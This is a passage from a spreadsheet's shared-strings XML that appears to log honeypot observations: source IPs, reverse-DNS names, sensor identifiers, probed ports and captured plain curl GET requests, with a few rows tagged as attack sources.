MA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_TELNET_H5</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;23&amp;&amp;5900&amp;&amp;5060&amp;&amp;1080&amp;&amp;9100&amp;&amp;6379&amp;&amp;1521&amp;&amp;21&amp;&amp;631&amp;&amp;443&amp;&amp;1902&amp;&amp;20522&amp;&amp;36296&amp;&amp;11140&amp;&amp;16782</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7de5:4f9</t>
  </si>
  <si>
    <t>b94f7af4ef25f4e2fea3ec7549094059</t>
  </si>
  <si>
    <t>125.228.119.130</t>
  </si>
  <si>
    <t>125-228-119-130.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H10</t>
  </si>
  <si>
    <t>23&amp;&amp;59844&amp;&amp;36480&amp;&amp;9100</t>
  </si>
  <si>
    <t>::ffff:7de4:7782</t>
  </si>
  <si>
    <t>178fd80a0a6d0117c94c10b9e940f2fb</t>
  </si>
  <si>
    <t>122.117.4.165</t>
  </si>
  <si>
    <t>122-117-4-165.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H2&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H20</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;55518&amp;&amp;23&amp;&amp;80&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:7a75:4a5</t>
  </si>
  <si>
    <t>d1e6dace67da999caae493642010101a</t>
  </si>
  <si>
    <t>114.35.114.164</t>
  </si>
  <si>
    <t>114-35-114-164.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H20&amp;&amp;SMA-LAB_TELNET_H8</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;23&amp;&amp;10569&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7223:72a4</t>
  </si>
  <si>
    <t>4a533ab49c05b96de4ca915f6ef84123</t>
  </si>
  <si>
    <t>114.34.244.28</t>
  </si>
  <si>
    <t>114-34-244-28.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_NTP_H7&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_MT-CPA_H44</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;123&amp;&amp;14103&amp;&amp;39574&amp;&amp;23</t>
  </si>
  <si>
    <t>25.0143</t>
  </si>
  <si>
    <t>121.467</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7222:f41c</t>
  </si>
  <si>
    <t>0b53220dd5ec94afcc348ba74d2228f3</t>
  </si>
  <si>
    <t>59.126.229.170</t>
  </si>
  <si>
    <t>59-126-229-170.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H40</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;80&amp;&amp;32341&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:3b7e:e5aa</t>
  </si>
  <si>
    <t>dee27a047c553d4bef900c8d0436da96</t>
  </si>
  <si>
    <t>117.207.160.222</t>
  </si>
  <si>
    <t>::ffff:75cf:a0de</t>
  </si>
  <si>
    <t>a8d4f3eaccb1f384591f78dcfeedc245</t>
  </si>
  <si>
    <t>59.92.185.181</t>
  </si>
  <si>
    <t>::ffff:3b5c:b9b5</t>
  </si>
  <si>
    <t>7bb08fa8e368b86f20d71c018508f05e</t>
  </si>
  <si>
    <t>220.132.6.48</t>
  </si>
  <si>
    <t>220-132-6-48.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H41&amp;&amp;SMA-LAB_MT-CPA_H4&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H41</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;6189&amp;&amp;23&amp;&amp;9100</t>
  </si>
  <si>
    <t>::ffff:dc84:630</t>
  </si>
  <si>
    <t>28ef5bb14424893be5f3a1df5247081e</t>
  </si>
  <si>
    <t>125.229.252.183</t>
  </si>
  <si>
    <t>125-229-252-183.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_DNS_H2&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H47</t>
  </si>
  <si>
    <t>80&amp;&amp;53&amp;&amp;14558&amp;&amp;23&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7de5:fcb7</t>
  </si>
  <si>
    <t>2f2ac7679927c3afacb7744f07e7d2a4</t>
  </si>
  <si>
    <t>122.117.135.153</t>
  </si>
  <si>
    <t>122-117-135-153.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_SSH_H46&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H39</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;22&amp;&amp;14302&amp;&amp;80&amp;&amp;55725&amp;&amp;59622&amp;&amp;59584&amp;&amp;59640&amp;&amp;9100&amp;&amp;55240&amp;&amp;55286&amp;&amp;55330&amp;&amp;56982&amp;&amp;58202&amp;&amp;55535&amp;&amp;37726&amp;&amp;45744&amp;&amp;38594</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7a75:8799</t>
  </si>
  <si>
    <t>2d9a7424a5f5f3a407b04903f97edcee</t>
  </si>
  <si>
    <t>116.103.77.110</t>
  </si>
  <si>
    <t>SMA-LAB_POSTGRES_HC1&amp;&amp;SMA-LAB_POSTGRES_H4</t>
  </si>
  <si>
    <t>::ffff:7467:4d6e</t>
  </si>
  <si>
    <t>22c3dbbd4cbb340d2fff547ebeabf5f3</t>
  </si>
  <si>
    <t>59.126.35.101</t>
  </si>
  <si>
    <t>59-126-35-101.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_DNS_H9&amp;&amp;SMA-LAB_MT-CPA_H6&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H13</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;53&amp;&amp;3058&amp;&amp;23&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:3b7e:2365</t>
  </si>
  <si>
    <t>ee6e32feb12524d193b69260287c4038</t>
  </si>
  <si>
    <t>117.235.230.200</t>
  </si>
  <si>
    <t>::ffff:75eb:e6c8</t>
  </si>
  <si>
    <t>5b0a8bb544640a35cc0b5056cd435d24</t>
  </si>
  <si>
    <t>117.208.92.155</t>
  </si>
  <si>
    <t>::ffff:75d0:5c9b</t>
  </si>
  <si>
    <t>7526adc6e8013a38a0b66acabca3c8b5</t>
  </si>
  <si>
    <t>220.132.149.61</t>
  </si>
  <si>
    <t>NA&amp;&amp;220-132-149-61.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Suspicious Web Activity Detected</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H31</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;33883&amp;&amp;23&amp;&amp;NA&amp;&amp;9100&amp;&amp;34894&amp;&amp;80</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:dc84:953d</t>
  </si>
  <si>
    <t>238d07d3f21b7d8fe20aae33da8c94a0</t>
  </si>
  <si>
    <t>59.183.172.46</t>
  </si>
  <si>
    <t>::ffff:3bb7:ac2e</t>
  </si>
  <si>
    <t>de6ae0c7bb8bac90a15abd782549a6f9</t>
  </si>
  <si>
    <t>218.161.97.71</t>
  </si>
  <si>
    <t>218-161-97-71.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H14&amp;&amp;SMA-LAB_MT-CPA_H13&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H6</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;33479&amp;&amp;NA&amp;&amp;23&amp;&amp;80&amp;&amp;47778&amp;&amp;9100&amp;&amp;56581</t>
  </si>
  <si>
